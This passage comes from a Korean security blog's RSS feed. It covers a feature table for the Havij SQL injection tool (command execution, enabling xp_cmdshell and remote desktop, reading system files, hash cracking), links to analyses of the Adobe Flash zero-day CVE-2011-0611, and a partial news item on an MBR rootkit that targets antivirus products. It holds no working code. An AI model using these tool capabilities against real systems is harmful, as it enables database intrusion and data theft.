&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;21. Executing SQL query in Oracle database&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;22. Getting one row in one request (all in one request)&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;23. Dumping data into file&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;24. Saving data as XML format&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;25. View every injection request sent by program&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;26. Enabling xp_cmdshell and remote desktop&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/nok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;27. Multi thread Admin page finder&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;28. Multi thread Online MD5 cracker&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;29. Getting DBMS Informations&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;30. Getting tables, columns and data&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;31. Command executation (mssql only)&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;32. Reading system files (mysql only)&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&lt;FONT size=2 face=Verdana&gt;33. insert/update/delete data&lt;/FONT&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/ok.png&quot; width=16 height=16&gt;&lt;/TD&gt;&lt;/TR&gt;
&lt;TR&gt;
&lt;TD bgColor=#ece9ed width=450&gt;&amp;nbsp;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;A href=&quot;http://www.itsecteam.com/en/projects/project1_page2.htm&quot;&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/down.gif&quot; width=25 height=30&gt;&lt;/A&gt;&lt;/TD&gt;
&lt;TD bgColor=#ece9ed width=75 align=middle&gt;&lt;A href=&quot;http://www.itsecteam.com/en/projects/project1_page6.htm&quot;&gt;&lt;IMG border=0 src=&quot;http://www.itsecteam.com/pic/purchase.gif&quot; width=33 height=29&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
&lt;P&gt;&lt;/P&gt;&amp;nbsp;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
패킷 떠서 분석해봐야겠군요..후후후&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&amp;nbsp;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt; 
&lt;P&gt;&lt;/P&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-142-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-142-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-142-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/142&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x04 reference&amp;tools</category>
			<category>Havij</category>
			<category>sql injection</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/142</guid>
			<comments>http://malwarelab.tistory.com/entry/Havij-v114-Advanced-SQL-Injection#entry142comment</comments>
			<pubDate>Thu, 14 Apr 2011 21:09:47 +0900</pubDate>
		</item>
		<item>
			<title>Adobe Flash Player, Adobe Reader and Acrobat [CVE-2011-0611]</title>
			<link>http://malwarelab.tistory.com/entry/Adobe-Flash-Player-Adobe-Reader-and-Acrobat-CVE-2011-0611</link>
			<description>&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img src=&quot;http://sophosnews.files.wordpress.com/2011/04/wordicon175.jpg?w=175&amp;amp;h=173&quot; alt=&quot;Word/Flash logo&quot;&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
4월 11일 Adobe 신규 0-day가 발표되었습니다.&lt;br /&gt;
&lt;br /&gt;
doc 파일에 포함된 swf에 의해 악성코드에 감염이 될 수 있으며 이메일로 전파되고 있다고 합니다.&lt;br /&gt;
&lt;br /&gt;
분석글들이 나오고 있는데요..&lt;br /&gt;
&lt;br /&gt;
샘플은 확보를 했는데 아직 분석은...ㅜ.ㅜ&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;b&gt;1. Vulnerability Description from Adobe&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;http://www.adobe.com/support/security/advisories/apsa11-02.html&quot; target=&quot;_blank&quot; title=&quot;[http://www.adobe.com/support/security/advisories/apsa11-02.html]로 이동합니다.&quot;&gt;http://www.adobe.com/support/security/advisories/apsa11-02.html&lt;/a&gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;2. Analysis document&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
Apr. 8 CVE-2011-0611 Flash Player Zero day - SWF in DOC - Disentangling Industrial Policy..&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html&quot; target=&quot;_blank&quot; title=&quot;[http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html]로 이동합니다.&quot;&gt;http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
CVE-2011-0611 Adobe Flash Zero Day embeded in DOC&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html&quot; target=&quot;_blank&quot; title=&quot;[http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html]로 이동합니다.&quot;&gt;http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
Analysis of the CVE-2011-0611 Adobe Flash Player vulnerability exploitation&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx&quot; target=&quot;_blank&quot; title=&quot;[http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx]로 이동합니다.&quot;&gt;http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
Using &quot;volatility&quot; to study the CVE-2011-0611 Adobe Flash 0-day&lt;/div&gt;
&lt;div&gt;&lt;a href=&quot;http://sempersecurus.blogspot.com/2011/04/using-volatility-to-study-cve-2011-6011.html&quot; target=&quot;_blank&quot; title=&quot;[http://sempersecurus.blogspot.com/2011/04/using-volatility-to-study-cve-2011-6011.html]로 이동합니다.&quot;&gt;http://sempersecurus.blogspot.com/2011/04/using-volatility-to-study-cve-2011-6011.html&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-141-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-141-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-141-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/141&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x06 vulnerability</category>
			<category>Acrobat</category>
			<category>adobe</category>
			<category>CVE-2011-0611</category>
			<category>Flash Player</category>
			<category>reader</category>
			<category>어도비 올해도 빵빵 터지는구나</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/141</guid>
			<comments>http://malwarelab.tistory.com/entry/Adobe-Flash-Player-Adobe-Reader-and-Acrobat-CVE-2011-0611#entry141comment</comments>
			<pubDate>Wed, 13 Apr 2011 13:13:13 +0900</pubDate>
		</item>
		<item>
			<title>New Chinese MBR Rootkit Identified</title>
			<link>http://malwarelab.tistory.com/entry/New-Chinese-MBR-Rootkit-Identified</link>
			<description>&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;p style=&quot;margin:0&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile3.uf.tistory.com/original/1826B63B4D9C1E1C1E4613&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile3.uf.tistory.com/image/1826B63B4D9C1E1C1E4613&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;mbrrkbanks.jpg&quot; height=&quot;314&quot; width=&quot;450&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/p&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;div&gt;
&lt;a href=&quot;http://www.thehackernews.com/2011/04/new-chinese-mbr-rootkit-identified.html&quot; target=&quot;_blank&quot; title=&quot;[http://www.thehackernews.com/2011/04/new-chinese-mbr-rootkit-identified.html]로 이동합니다.&quot;&gt;http://www.thehackernews.com/2011/04/new-chinese-mbr-rootkit-identified.html&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;
중국 성인사이트에서 유포된 다운로더에 의해 설치된 bootkit이 발견되었다고 합니다.&lt;/div&gt;
&lt;div&gt;Kaspersky에서 Rootkit.Win32.Fisp.a 라는 이름으로 탐지된다고 하네요.&lt;/div&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;
보통 MBR 루트킷들이 하는 행동을 그대로 하구요&lt;/div&gt;
&lt;div&gt;fips.sys 시스템 드라이버를 루트킷 자신의 드라이버로 대체하고 로딩된 프로세스들을 스캔하여 AV가 있는지 찾는다고 합니다.&lt;/div&gt;
&lt;div&gt;&lt;br /&gt;
대상이 되는 AV 제품은 다음과 같습니다.&lt;/div&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;
Beike&lt;/div&gt;
&lt;div&gt;Rising&lt;/div&gt;
